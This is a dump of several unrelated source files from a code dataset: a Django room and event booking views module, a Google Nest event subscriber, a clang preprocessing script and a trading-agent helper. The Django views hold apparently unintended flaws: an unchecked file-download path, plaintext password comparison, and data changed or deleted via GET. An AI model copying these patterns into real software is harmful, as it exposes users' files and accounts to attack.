instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n # messages.success(request, f'Profile has been updated successfully')\n return redirect('profile')\n\n else:\n u_form = UserUpdateForm(instance=request.user)\n p_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form\n }\n\n return render(request, 'registration/profile.html', context)\n\n\n\n\ndef registerPage(request):\n\tform = CreateUserForm()\n\n\tif request.method == 'POST':\n\t\tform = CreateUserForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('login')\n\n\tcontext = {'form':form}\n\treturn render(request,'user/register.html',context)\n\n\ndef download(request, path):\n\tfile_path = os.path.join(settings.MEDIA_ROOT, path)\n\tif os.path.exists(file_path):\n\t\twith open(file_path, 'rb') as fh:\n\t\t\tresponse = HttpResponse(fh.read(),content_type=\"application/vnd.ms-excel\")\n\t\t\tresponse['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_path)\n\t\t\treturn response\n\t\traise Http404\t\n\ndef files_view(request):\n\tfiles = rooms_models.Document.objects.filter(id=request.id)\n\treturn render(request, template_name='user/download.html')\n\ndef loginPage(request):\n\tcontext = {}\n\treturn render(request,'user/login.html',context)\n\n\n\n\n\ndef activation_sent_view(request):\n return render(request, 'registration/activation_sent.html')\n\n\ndef activate(request,uidb64,token):\n\ttry:\n\t\tuid = force_text(urlsafe_base64_decode(uidb64))\n\t\tuser = User.objects.get(pk=uid)\n\texcept (TypeError,ValueError,OverflowError,user.DoesNotExist):\n\t\tuser = None\n\tif user is not None and account_activation_token.check_token(user,token):\n\t\tuser.is_active = True\n\t\tuser.profile.signup_confirmation = True\n\t\tuser.save()\n\n\t\treturn redirect('home')\t\n\telse:\n\t\treturn render(request,'activation_invalid.html')\n\n\n\n# def activate(request, uidb64, token):\n# try:\n# uid = force_text(urlsafe_base64_decode(uidb64))\n# user = User.objects.get(pk=uid)\n# except (TypeError, ValueError, OverflowError, User.DoesNotExist):\n# user = None\n# # checking if the user exists, if the token is valid.\n# if user is not None and account_activation_token.check_token(user, token):\n# # if valid set active true \n# user.is_active = True\n# # set signup_confirmation true\n# user.profile.signup_confirmation = True\n# user.save()\n# login(request,user)\n# return redirect('home')\n# else:\n# return render(request, 'activation_invalid.html')\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db()\n # user.profile.first_name = form.cleaned_data.get('first_name')\n # user.profile.last_name = form.cleaned_data.get('last_name')\n user.profile.email = form.cleaned_data.get('email')\n # user can't login until link confirmed\n user.is_active = True\n user.save()\n login = {\n 'user':user\n }\n current_site = get_current_site(request)\n subject = 'Please Activate Your Account'\n # load a template like get_template() \n # and calls its render() method immediately.\n message = render_to_string('registration/account_activation_email.html', {\n 'user': user,\n 'domain': current_site.domain,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n # method will generate a hash value with user related data\n 'token': account_activation_token.make_token(user),\n })\n user.email_user(subject, message)\n 
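# The account_activation_token imported from .tokens is not shown in this
# file; such tokens are commonly built as a PasswordResetTokenGenerator
# subclass along these lines (an assumed sketch, not the project's code):
from django.contrib.auth.tokens import PasswordResetTokenGenerator

class AccountActivationTokenGenerator(PasswordResetTokenGenerator):
    def _make_hash_value(self, user, timestamp):
        # Folding signup_confirmation into the hash invalidates the link
        # once the account has been confirmed.
        return f"{user.pk}{timestamp}{user.profile.signup_confirmation}"

account_activation_token = AccountActivationTokenGenerator()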
return redirect('activation_sent')\n else:\n form = SignUpForm()\n return render(request, 'registration/signup.html', {'form': form})\n\n\ndef loginPage(request):\n\tif request.method == 'POST':\n\t\tusername = request.POST.get('username')\n\t\tpassword = request.POST.get('password')\n\n\t\tuser = authenticate(request,username=username,password=password)\n\n\t\tif user is not None:\n\t\t\tlogin(request,user)\n\t\t\treturn redirect('home')\n\t\telse:\t\n\t\t\tmessages.info(request,'Username OR Password is incorrect')\n\tcontext = {}\n\treturn render(request,'registration/login.html',context)\t\t\n\n\n\n# def signup(request):\n# if request.method == 'POST':\n# form = rooms_forms.SignUpForm(request.POST)\n# if form.is_valid():\n# form.save()\n# username = form.cleaned_data.get('username')\n# raw_password = form.cleaned_data.get('password1')\n# user = authenticate(username=username, password=raw_password)\n# login(request, user)\n# return redirect('home')\n# else:\n# form = rooms_forms.SignUpForm()\n# return render(request, 'temps/signup.html', {'form': form})\n\n\n# Create your views here.\n\n\n# def home(request):\n# \treturn render(request,'temps/home.html')\n\n# def rooms(request):\n# \tform_class = rooms_forms.RoomForm\n# \tif request.method == 'POST':\n# \t\tform = form_class(data=request.POST)\n# \t\tif form.is_valid():\n# \t\t\tNewrooms = Room()\n# \t\t\tNewrooms.rooms = request.POST.get('rooms')\n# \t\t\tNewrooms.location = request.POST.get('location')\n# \t\t\tNewrooms.status = request.POST.get('status')\n# \t\t\tNewrooms.created = timezone.now()\n# \t\t\tNewrooms.save()\n# \t\t\treturn redirect('home')\n# \t\telse:\n# \t\t\tform = form_class\n# \treturn render(request, 'temps/rooms.html',{'rooms':form_class})\n# def rooms(request):\n# \tif request.method == 'POST' and request.FILES['myfile']:\n# \t\tmyfile = request.FILES['myfile']\n# \t\tfs = FileSystemStorage()\n# \t\tfilename = fs.save(myfile.name, myfile)\n# \t\tuploaded_file_url = fs.url(filename)\n# \t\treturn render(request, 'temps/rooms.html',{\n# \t\t\t'uploaded_file_url':uploaded_file_url\n# \t\t\t})\n# \treturn render(request,'temps/rooms.html')\t\n\n\n# def signup_view(request):\n# \tform = UserCreationForm(request.POST)\n# \tif form.is_valid():\n# \t\tform.save()\n# \t\tusername = form.cleaned_data.get('username')\n# \t\tpassword = form.cleaned_data.get('password1')\n# \t\tuser = authenticate(username=username,password=password)\n# \t\tlogin(request,user)\n# \t\treturn redirect('home')\n# \treturn render(request,'signup.html',{'form':form})\t\n\n@login_required\ndef rooms(request): \t\n\tdoc = rooms_models.Document.objects.all()\n\tif request.method == 'POST':\n\t\tform = rooms_forms.DocumentForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('home')\n\telse:\n\t\tform = rooms_forms.DocumentForm()\n\treturn render(request,'temps/rooms.html',{\n\t\t'form':form\n\t\t})\n\t\n\n# def events(request):\n# \tform = rooms_forms.EventsForm\n# \tevents = Events.objects.all()\n\n# \tif request.POST.get('action') == 'post':\n# \t\ttitle = request.POST.get('title')\n# \t\tdescription = request.POST.get('description')\n\n\n# \t\tobj = Events.objects.create(\n# \t\t\ttitle = title,\n# \t\t\tdescription = description,\n# \t\t\t)\n# \t\tuser = {'id':obj.id,'title':obj.title,'description':obj.description}\n# \t\tresponse_data = {\n# \t\t 'user':user\n# \t\t}\n# \t\treturn JsonResponse(response_data)\n# \treturn render(request, 'temps/events.html',{'events':events})\t\n@login_required\ndef 
events(request):\n\tform_class = rooms_forms.EventForm\n\tevents = Events.objects.all()\n\n\tif request.POST.get('action') == 'post':\n\t\ttitle = request.POST.get('title')\n\t\tdescription = request.POST.get('description')\n\n\t\tobj = Events.objects.create(\n\t\t\ttitle = title,\n\t\t\tdescription=description,\n\n\t\t\t)\n\t\tuser = {'id':obj.id,'title':obj.title,'description':obj.description}\n\n\t\tresponse_data = {\n\t\t 'user':user\n\t\t}\n\t\treturn JsonResponse(response_data)\n\treturn render(request, 'temps/events.html',{'events':events})\t\n\n@login_required\ndef events_update(request):\n\tid = request.GET.get('id',None)\n\ttitle = request.GET.get('title',None)\n\tdescription = request.GET.get('description',None)\n\n\tobj = Events.objects.get(id=id)\n\tobj.title = title\n\tobj.description = description\n\tobj.save()\n\n\tuser = {'id':obj.id,'title':obj.title,'description':obj.description}\n\n\tresponse_data = {\n\t 'user':user\n\t}\n\treturn JsonResponse(response_data)\n\n@login_required\ndef events_delete(request):\n\tid = request.GET.get('id',None)\n\tEvents.objects.get(id=id).delete()\n\tresponse_data = {\n\t 'deleted':True\n\t}\n\treturn JsonResponse(response_data)\n\n\n# def events_delete(request):\n# \tid = request.GET.get('id',None)\n# \tEvent.objects.get(id=id).delete()\n# \tresponse_data = {\n# \t 'deleted':True\n# \t}\n# \treturn JsonResponse(response_data)\n\n\n\t\t\n\n\n\n\n\t \t \n\n\n# def delete(request,id):\n# \tobj = Event.objects.get(id=id)\n# \tobj.delete()\n# \treturn JsonResponse(response_data)\n\n# def event(request):\n# \tform_class = rooms_forms.EventForm\n# \tevent = Event.objects.all()\n# \tresponse_data = {}\n\n# \tif request.POST.get('action') == 'post':\n# \t\ttitle = request.POST.get('title')\n# \t\tdescription = request.POST.get('description')\n# \t\tvenue = request.POST.get('venue')\n# \t\tmdate = request.POST.get('mdate')\n# \t\tmtime = request.POST.get('mtime')\n\n# \t\tresponse_data['title'] = title\n# \t\tresponse_data['description'] = description\n# \t\tresponse_data['venue'] = venue\n# \t\tresponse_data['mdate'] = mdate\n# \t\tresponse_data['mtime'] = mtime\n\n\n# \t\tEvent.objects.create(\n# \t\t\ttitle = title,\n# \t\t\tdescription = description,\n# \t\t\tvenue = venue,\n# \t\t\tmdate = mdate,\n# \t\t\tmtime = mtime,\n# \t\t\t)\n# \t\treturn JsonResponse(response_data)\n \n# \treturn render(request, 'temps/event.html',{'event':event})\t\n\n@login_required\ndef student(request):\n\tform_class = rooms_forms.StudentForm\n\tstudent = rooms_models.Student.objects.all()\n\n\tif request.POST.get('action') == 'post':\n\t\tcourse = request.POST.get('course')\n\t\tunit = request.POST.get('unit')\n\t\tyear_of_study = request.POST.get('year_of_study')\n\t\trooms = request.POST.get('rooms')\n\t\tmtime = request.POST.get('mtime')\n\n\t\tobj = rooms_models.Student.objects.create(\n\t\t\tcourse = course,\n\t\t\tunit = unit,\n\t\t\tyear_of_study = year_of_study,\n\t\t\trooms = rooms,\n\t\t\tmtime = mtime,\n\t\t\t)\n\t\tuser = {'course':obj.course,'unit':obj.unit,'year_of_study':obj.year_of_study,'rooms':obj.rooms,'mtime':obj.mtime}\n\t\tresponse_data = {\n\t\t 'user':user\n\t\t}\n\t\treturn JsonResponse(response_data)\n\treturn render(request,'temps/students.html',{'student':student})\t\n\n# def student(request):\t\n# \tid = request.GET.get('id',None)\n# \trooms = request.GET.get('rooms',None)\n\n# \tobj = rooms_models.Student.objects.get(id=id)\n# \tobj.rooms = rooms\n# \tobj.save()\n\n# \tuser = {'id':obj.id,'rooms':obj.rooms}\n# \tresponse_data = { \n# 
\t'user':user\n# \t}\n# \treturn JsonResponse(response_data)\n\n\ndef login(request):\n\tm = Member.objects.get(username=request.POST['username'])\n\tif m.password == request.POST['password']:\n\t\trequest.session['member_id'] = m.id\n\t\treturn HttpResponse(\"you're logged in.\")\n\telse:\n\t\treturn HttpResponse(\"Your username and password didn't match.\")\n\ndef logout(request):\n\ttry:\n\t\tdel request.session['member_id']\n\texcept KeyError:\n\t\tpass\n\treturn HttpResponse(\"you're logged out.\")\t\n@login_required\n#creating\ndef search(request):\n\tif request.method=='POST':\n\t\tsrch = request.POST['srh']\n\n\t\tif srch:\n\t\t\tmatch = rooms_models.Student.objects.filter(Q(course__icontains=srch)|\n\t\t\t\t Q(unit__icontains=srch)\n\t\t\t\t )\n\t\t\tif match:\n\t\t\t\treturn render(request,'temps/search.html',{'sr':match})\n\t\t\telse:\n\t\t\t messages.error(request,'no result found')\n\t\telse:\n\t\t\treturn HttpResponseRedirect('/search/')\n\treturn render(request,'temps/search.html')\n\n@login_required\t\t \ndef event(request):\n\t# form_class = rooms_forms.EventForm\n\tevent = rooms_models.Event.objects.all()\n\n\tif request.POST.get('action') == 'post':\n\t\ttitle1 = request.POST.get('title')\n\t\tdescription1 = request.POST.get('description')\n\t\tvenue1 = request.POST.get('venue')\n\t\tmdate1 = request.POST.get('mdate')\n\t\tmtime1 = request.POST.get('mtime')\n\n\n\t\tobj = rooms_models.Event.objects.create(\n\t\t\ttitle = title1,\n\t\t\tdescription =description1,\n\t\t\tvenue = venue1,\n\t\t\tmdate = mdate1,\n\t\t\tmtime = mtime1,\n\t\t\t)\n\t\tuser = {'id':obj.id,'title':obj.title,'description':obj.description,'venue':obj.venue,'mdate':obj.mdate,'mtime':obj.mtime}\n\n\t\tresponse_data = {\n\t\t 'user':user\n\t\t}\n\t\treturn JsonResponse(response_data)\n\treturn render(request, 'temps/event.html',{'event':event})\t\n#updating\n@login_required\ndef event_update(request):\n\tid1 = request.GET.get('id',None)\n\ttitle1 = request.GET.get('title',None)\n\tdescription1 = request.GET.get('description',None)\n\tvenue1 = request.GET.get('venue',None)\n\tmdate1 = request.GET.get('mdate',None)\n\tmtime1 = request.GET.get('mtime',None)\n\n\tobj = rooms_models.Event.objects.get(id= id1)\n\tobj.title = title1\n\tobj.description = description1\n\tobj.venue = venue1\n\tobj.mdate = mdate1\n\tobj.mtime = mtime1\n\tobj.save()\n\n\tuser = {'id':obj.id,'title':obj.title,'description':obj.description,'venue':obj.venue,'mdate':obj.mdate,'mtime':obj.mtime}\n\tresponse_data = {\n 'user':user\n\t}\n\treturn JsonResponse(response_data)\n\n@login_required\ndef emptyrooms(request):\n\tform_class = rooms_forms.EmptyroomForm\n\temptyrooms = Emptyroom.objects.all()\n\n\tif request.POST.get('action') == 'post':\n\t\trooms = request.GET.get('rooms')\n\t\tlocation = request.POST.get('location')\n\n\t\tobj = Emptyroom.objects.create(\n\t\t\trooms = rooms,\n\t\t\tlocation = location,\n\t\t\t)\n\t\tuser = {'id':obj.id,'rooms':obj.rooms,'location':obj.location}\n\n\t\tresponse_data = {\n\t\t 'user':user\n\t\t}\n\t\treturn JsonResponse(response_data)\n\treturn render(request, 'temps/emptyrooms.html',{'emptyrooms':emptyrooms})\t\t\n\n@login_required\ndef emptyrooms_up(request):\t\n\tid1 = request.GET.get('id',None)\n\trooms = request.GET.get('rooms',None)\n\n\tobj = Emptyroom.objects.get(id=id)\n\tobj.rooms = rooms\n\tobj.save()\n\n\tuser = {'id':obj.id,'rooms':obj.rooms}\n\tresponse_data = {\n\t 'user':user\n\t}\n\treturn JsonResponse(response_data)\n\t \n\n\t \n\t\n#deleting\n\n@login_required\ndef 
event_delete(request):\n\tid = request.GET.get('id',None)\n\trooms_models.Event.objects.get(id=id).delete()\n\tresponse_data = {\n\t 'deleted':True\n\t}\n\treturn JsonResponse(response_data)\n\n\n# def students(request):\n# \tform_class = rooms_forms.StudentForm\n# \tstudent = rooms_models.Student.objects.all()\n# \tif request.POST.get('action') == 'post':\n# \t\tcourse = request.POST.get('course')\n# \t\tyear_of_study = request.POST.get('year_of_study')\n# \t unit = request.POST.get('unit')\n# rooms = request.POST.get('rooms')\n\n# \t obj = rooms_models.Student.objects.create(\n# \t \tcourse = course,\n# \t \tyear_of_study = year_of_study,\n# \t \tunit = unit,\n# \t \trooms = rooms,\n# \t)\n# user = {'course':obj.course,'year_of_study':obj.year_of_study,'unit':obj.unit,'rooms':obj.rooms}\n\n# data = {\n# 'user':user\n# }\n# return JsonResponse(data)\n# # return render(request,'temps/',{'student':student}) \n\n\n\n\n\n\n\n\n\n\n# def events(request):\n# \tform_class = rooms_forms.EventsForm\n# \tif request.method == 'POST':\n# \t\ttitle = request.POST.get('title')\n# \t\tdescription = request.POST.get('description')\n# \t\tdate = request.POST.get('date')\n# \t\ttime = request.POST.get('time')\n# \t\tvenue = request.POST.get('venue')\n# \t\tcreated = timezone.now()\n# \t\tfeedback = rooms_models.Events.objects.create(\n# \t\t\t\tvenue=venue,\n# \t\t\t title=title,\n# \t\t\t\tdescription=description,\n# \t\t\t\tdate=date,\n# \t\t\t\ttime=time,\n# \t\t\t\t)\n# \t\tfeedback.save()\n# \t\tdata = {\n# \t\t\t\tvenue:venue,\n# \t\t\t\ttitle:title,\n# \t\t\t\tdescription:description,\n# \t\t\t\tdate:date,\n# \t\t\t\ttime:time,\n# \t\t\t\tcreated:created\n# \t\t\t}\n\t \n\n# \t\treturn JsonResponse({'data':'data'})\n# \treturn JsonResponse({'data':'Error'})\n\n# \t\t# \tNewEvents.save()\n# \t\t# \treturn redirect('home')\n# \t\t# else:\n# \t\t# form =form_class\t\n\n# \treturn render(request, 'temps/events.html',{'rooms':form_class})\t\t\n\n\n\n# def emptyrooms(request):\n# \tform_class = rooms_forms.EmptyroomForm\n# \tif request.method == 'POST':\n# \t\tform = form_class(data=request.POST)\n# \t\tif form.is_valid():\n# \t\t\tNewrooms = Room()\n# \t\t\tNewrooms.rooms = request.POST.get('rooms')\n# \t\t\tNewrooms.location = request.POST.get('location')\n# \t\t\tNewrooms.status = request.POST.get('status')\n# \t\t\tNewrooms.created = timezone.now()\n# \t\t\tNewrooms.save()\n# \t\t\treturn redirect('home')\n# \t\telse:\n# \t\t\tform = form_class\n# \treturn render(request,'temps/emptyrooms.html',{'rooms':form_class})\n\n# def students(request):\n# \tform_class = rooms_forms.StudentForm\n# \tif request.method == 'POST':\n# \t\tform = form_class(data=request.POST)\n# \t\tif form.is_valid():\n# \t\t\tNewrooms = rooms_models.Student()\n# \t\t\tNewrooms.course= request.POST.get('course')\n# \t\t\tNewrooms.rooms = request.POST.get('rooms')\n# \t\t\tNewrooms.year_of_study = request.POST.get('year_of_study')\n# \t\t\tNewrooms.unit = request.POST.get('unit')\n# \t\t\tNewrooms.created = timezone.now()\n# \t\t\tNewrooms.save()\n# \t\t\treturn redirect('home')\n# \t\telse:\n# \t\t\tform = form_class\n# \treturn render(request, 'temps/students.html',{'rooms':form_class})\n\n@login_required\ndef lecturers(request):\n\tform_class = rooms_forms.LecturerForm\n\tif request.method == 'POST':\n\t\tform = form_class(data=request.POST)\n\t\tif form.is_valid():\n\t\t\tNewrooms =rooms_models.Lecturer()\n\t\t\tNewrooms.rooms = request.POST.get('rooms')\n\t\t\tNewrooms.course= request.POST.get('course')\n\t\t\tNewrooms.unit= 
request.POST.get('unit')\n\t\t\tNewrooms.status = request.POST.get('status')\n\t\t\tNewrooms.created = timezone.now()\n\t\t\tNewrooms.save()\n\t\t\treturn redirect('home')\n\t\telse:\n\t\t\tform = form_class\n\treturn render(request, 'temps/lecturers.html',{'rooms':form_class})\t\t\n\n\n\n# def emptyrooms(request):\n# \tform_class = rooms_forms.EmptyroomForm\n# \temptyrooms = Emptyroom.objects.all()\n# \tresponse_data = {}\n\n# \tif request.POST.get('action') == 'post':\n# \t\trooms = request.GET.get('rooms')\n# \t\tlocation = request.POST.get('location')\n\n# \t\tresponse_data['rooms'] = rooms\n# \t\tresponse_data['location'] = location\n\n\n# \t\tEmptyroom.objects.create(\n# \t\t\trooms = rooms,\n# \t\t\tlocation = location,\n# \t\t\t)\n# \t\treturn JsonResponse(response_data)\n# \treturn render(request, 'temps/emptyrooms.html',{'emptyrooms':emptyrooms})\t\n\n\n\n# class CrudView(ListView):\n# model = CrudUser\n# template_name = 'temps/home.html'\n# context_object_name = 'users'\n\n# def crudview(request):\n# \tmodel = CrudUser\n# \ttemplate_name = 'temps/home.html'\n# \tcontext_object_name = 'users'\n\ndef home(request):\n\tmodel = CrudUser\n\tcruduser = CrudUser.objects.all()\n\tcontext_object_name = 'users'\n\tif request.POST.get('action') == 'post':\n\t\tname1 = request.POST.get('name',None)\n\t\taddress1 = request.POST.get('address', None)\n\t\tage1 = request.POST.get('age', None)\n\n\t\tobj = CrudUser.objects.create(\n\t\t\tname = name1,\n\t\t\taddress = address1,\n\t\t\tage = age1,\n\t\t\t)\n\t\tuser = {'id':obj.id,'name':obj.name,'address':obj.address,'age':obj.age}\n\n\t\tdata = {\n\t\t'user': user\n\t\t}\n\t\treturn JsonResponse(data)\n\treturn render(request, 'temps/home.html', {'cruduser':cruduser})\t\n\n\ndef Update(request):\n\tmodel = CrudUser\n\tcruduser = CrudUser.objects.all()\n\tcontext_object_name = 'users'\n\tif request.GET.get('action') == 'post':\n\t\tid1 = request.GET.get('id',None)\n\t\tname1 = request.GET.get('name',None)\n\t\taddress1 = request.GET.get('address',None)\n\t\tage1 = request.GET.get('age',None)\n\n\t\tobj = CrudUser.objects.get(id=id1)\n\t\tobj.name = name1\n\t\tobj.address = address1\n\t\tobj.age = age1\n\t\tobj.save()\n\n\t\tuser = {'id':obj.id,'name':obj.name,'address':obj.address,'age':obj.age}\n\n\t\tdata = {\n\t\t 'user': user\n\t\t}\n\n\t\treturn JsonResponse(data)\n\n\n\n# class CreateCrudUser(ListView):\n# def get(self, request):\n# name1 = request.GET.get('name', None)\n# address1 = request.GET.get('address', None)\n# age1 = request.GET.get('age', None)\n\n# obj = CrudUser.objects.create(\n# name = name1,\n# address = address1,\n# age = age1\n# )\n\n# user = {'id':obj.id,'name':obj.name,'address':obj.address,'age':obj.age}\n\n# data = {\n# 'user': user\n# }\n# return JsonResponse(data)\t\n\n# class UpdateCrudUser(ListView):\n# def get(self, request):\n# id1 = request.GET.get('id', None)\n# name1 = request.GET.get('name', None)\n# address1 = request.GET.get('address', None)\n# age1 = request.GET.get('age', None)\n\n# obj = CrudUser.objects.get(id=id1)\n# obj.name = name1\n# obj.address = address1\n# obj.age = age1\n# obj.save()\n\n# user = {'id':obj.id,'name':obj.name,'address':obj.address,'age':obj.age}\n\n# data = {\n# 'user': user\n# }\n# return JsonResponse(data) \n\n\n \n# class DeleteCrudUser(ListView):\n# def get(self, request):\n# id1 = request.GET.get('id', None)\n# CrudUser.objects.get(id=id1).delete()\n# data = {\n# 'deleted': True\n# }\n# return 
JsonResponse(data)","sub_path":"rooms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67909699","text":"\"\"\"Subscriber for the Smart Device Management event based API.\"\"\"\nimport asyncio\nimport json\nimport logging\nfrom abc import ABC, abstractmethod\n\nfrom google.cloud import pubsub_v1\n\nfrom .auth import AbstractAuth\nfrom .device_manager import DeviceManager\nfrom .event import EventCallback, EventMessage\nfrom .google_nest_api import GoogleNestAPI\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass AbstractSusbcriberFactory(ABC):\n \"\"\"Abstract class for creating a subscriber, to facilitate testing.\"\"\"\n\n @abstractmethod\n async def new_subscriber(\n self, creds, subscription_name, callback\n ) -> pubsub_v1.subscriber.futures.StreamingPullFuture:\n \"\"\"Create a new event subscriber.\"\"\"\n\n\nclass DefaultSubscriberFactory(AbstractSusbcriberFactory):\n \"\"\"Default implementation that creates Google Pubsub subscriber.\"\"\"\n\n async def new_subscriber(\n self, creds, subscription_name, callback\n ) -> pubsub_v1.subscriber.futures.StreamingPullFuture:\n subscriber = pubsub_v1.SubscriberClient(credentials=creds)\n return subscriber.subscribe(subscription_name, callback)\n\n\nclass GoogleNestSubscriber:\n \"\"\"Subscribes to events from the Google Nest feed.\"\"\"\n\n def __init__(\n self,\n auth: AbstractAuth,\n project_id: str,\n subscriber_id: str,\n subscriber_factory: AbstractSusbcriberFactory = DefaultSubscriberFactory(),\n watchdog_delay: float = 10,\n ):\n \"\"\"Initialize the subscriber for the specified topic\"\"\"\n self._auth = auth\n self._subscriber_id = subscriber_id\n self._api = GoogleNestAPI(auth, project_id)\n self._subscriber_factory = subscriber_factory\n self._subscriber_future = None\n self._callback = None\n self._device_manager_task = asyncio.create_task(\n self._async_create_device_manager()\n )\n self._watchdog_delay = watchdog_delay\n if self._watchdog_delay > 0:\n self._watchdog_task = asyncio.create_task(self._watchdog())\n else:\n self._watchdog_task = None\n\n def set_update_callback(self, callback: EventCallback):\n \"\"\"Register a callback invoked when new messages are received.\"\"\"\n self._callback = callback\n\n async def start_async(self):\n \"\"\"Starts the subscriber.\"\"\"\n creds = await self._auth.async_get_creds()\n self._subscriber_future = await self._subscriber_factory.new_subscriber(\n creds, self._subscriber_id, self._subscribe_callback\n )\n\n async def _watchdog(self):\n \"\"\"Background task that watches the subscriber and restarts it.\"\"\"\n _LOGGER.debug(\"Starting background watchdog thread\")\n while True:\n if self._subscriber_future and self._subscriber_future.done():\n _LOGGER.debug(\"Subscriber shut down; restarting\")\n await self.start_async()\n await asyncio.sleep(self._watchdog_delay)\n\n def wait(self):\n \"\"\"Blocks on the subscriber.\"\"\"\n self._subscriber_future.result()\n\n def stop_async(self):\n \"\"\"Tells the subscriber to start shutting down.\"\"\"\n if self._watchdog_task:\n self._watchdog_task.cancel()\n if self._subscriber_future:\n self._subscriber_future.cancel()\n\n async def async_get_device_manager(self) -> DeviceManager:\n \"\"\"Return the DeviceManger with the current state of devices.\"\"\"\n return await self._device_manager_task\n\n async def _async_create_device_manager(self):\n \"\"\"Creates a DeviceManager, populated with initial state.\"\"\"\n 
device_manager = DeviceManager()\n structures = await self._api.async_get_structures()\n for structure in structures:\n device_manager.add_structure(structure)\n # Subscriber starts after a device fetch\n devices = await self._api.async_get_devices()\n for device in devices:\n device_manager.add_device(device)\n return device_manager\n\n def _subscribe_callback(self, message: pubsub_v1.subscriber.message.Message):\n payload = json.loads(bytes.decode(message.data))\n event = EventMessage(payload, self._auth)\n # Only accept device events once the Device Manager has been loaded.\n # We are ok with missing messages on startup since the device manager will\n # do a live read.\n if self._device_manager_task.done():\n self._device_manager_task.result().handle_event(event)\n if self._callback:\n self._callback.handle_event(event)\n message.ack()\n","sub_path":"google_nest_sdm/google_nest_subscriber.py","file_name":"google_nest_subscriber.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"216504128","text":"from __future__ import print_function\nimport os, fnmatch, datetime, sys, re, glob\nimport helper as helper\n\ntop = sys.argv[1]\n\nbuff = []\nftemp=helper.fileOpen(\"../env.tcl\")\nfor line in ftemp:\n if \"#\" in line:\n buff.append(line[0:line.find(\"#\")])\n else:\n buff.append(line)\nftemp.close()\nfor line in buff:\n if \"DSS=\" in line:\n dss = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"DSS=\"+dss)\n if \"CLANG=\" in line:\n clang = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"CLANG=\"+clang)\n if \"VHLS=\" in line:\n vhls = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"VHLS=\"+vhls)\n if \"OPT=\" in line:\n opt = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"OPT=\"+opt)\n if \"DHLS=\" in line:\n dhls = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"DHLS=\"+dhls)\nftemp.close()\n\nfT = glob.glob(top+'/src/*.cpp')\nnL = \"\"\nfor n in fT:\n\tline = n[n.rfind(\"/\")+1:n.find(\".cpp\")]\n\tif line == top:\n\t\tos.system(clang+\" -Xclang -disable-O0-optnone -emit-llvm -S -c \"+n+\" -o \"+top+\"/_build/ds/\"+line+\"_.ll\")\n\t\tnL = nL + \" \"+top+\"/_build/ds/\"+line+\"_.ll\"\n\telse:\n\t\tos.system(clang+\" -Xclang -disable-O0-optnone -emit-llvm -S -c \"+n+\" -o \"+top+\"/_build/ds/\"+line+\".ll\")\n\t\tnL = nL + \" \"+top+\"/_build/ds/\"+line+\".ll\"\n#os.system(\"llvm-link -S -v -o \"+top+\".ll *.ll\")\n\n","sub_path":"src/preprocess_ds.py","file_name":"preprocess_ds.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"209893533","text":"from collections import deque\nimport numpy as np\n\nclass AgentCore():\n def __init__(self, hold=10):\n self.bid = None\n self.ask = None\n self.mid = None\n self.spread = None\n self.change = {'bid':None, 'ask':None, 'mid':None, 'spread':None}\n \n self.order_length = 0\n self.diff = None\n self.order_dir = None\n \n self.hold = hold\n \n def check_hold(self, tick):\n if tick < self.hold:\n return True ## (In hold period)\n else:\n return False\n \n def update_bid_ask_mid_spread(self, bid, ask, modify_change=False):\n mid = (ask + bid)/2\n spread = ask - bid\n if modify_change and (self.bid != None):\n self.update_change(bid, ask, mid, spread)\n self.bid, self.ask = bid, ask \n self.mid = mid\n self.spread = spread\n return\n \n \n def update_change(self,bid, ask, mid, spread):\n 
self.change['bid'] = bid - self.bid\n self.change['ask'] = ask - self.ask\n self.change['mid'] = mid - self.mid\n self.change['spread'] = spread - self.spread\n \n \n def update_order(self, order):\n assert order ## ensures an order is open therefore a diff is valid\n self.order_length += 1\n self.diff = self.get_diff(order)\n self.order_dir = self.get_order_dir(order)\n return\n \n \n def reset_order(self):\n self.order_length = 0\n self.diff = None\n self.order_dif = None\n \n \n def get_order_dir(self, order):\n return 1 if order.type == \"buy\" else -1\n \n \n def get_diff(self, order):\n if order.type ==\"buy\":\n diff = self.bid - order.price\n else:\n diff = order.price - self.ask\n return diff\n \n\n def print_status(self, orders):\n if orders:\n print(\"Mid: {: .5f} | Change: {: .5f} | Spread: {: .5f}\\nDiff: {: .5f} | Length: {}\"\n .format(self.mid, self.change['ask'], self.spread,\n self.diff, self.order_length))\n else:\n print(f\"Mid: {self.mid: .5f} | Spread: {self.spread: .5f}\")\n \n\n \nclass Buffer():\n def __init__(self, buffer_length=100, step=1, rnn_input=False):\n self.buffer_length = buffer_length\n self.step = step\n self.rnn_input = rnn_input\n self.buffer = deque(maxlen=self.buffer_length)\n \n if self.rnn_input:\n self.rnn_input_template = self._get_rnn_in_template()\n pass\n \n \n def append(self, val):\n self.buffer.append(val)\n \n \n def get_array(self):\n \"\"\" Returns np.array from the deque \"\"\"\n return np.array(self.buffer)\n \n \n def get_mean(self):\n arr = self.get_array()\n return np.mean(arr)\n \n \n def get_vals_at_steps_reversed(self):\n \"\"\" Returns array with data at every step.\n Starts from end (most recent deque input) \"\"\"\n arr = self.get_array()\n return arr[::-self.step]\n \n \n def get_diff_array(self, arr):\n \"\"\" Returns array of differences between steps \"\"\"\n return np.diff(arr)\n 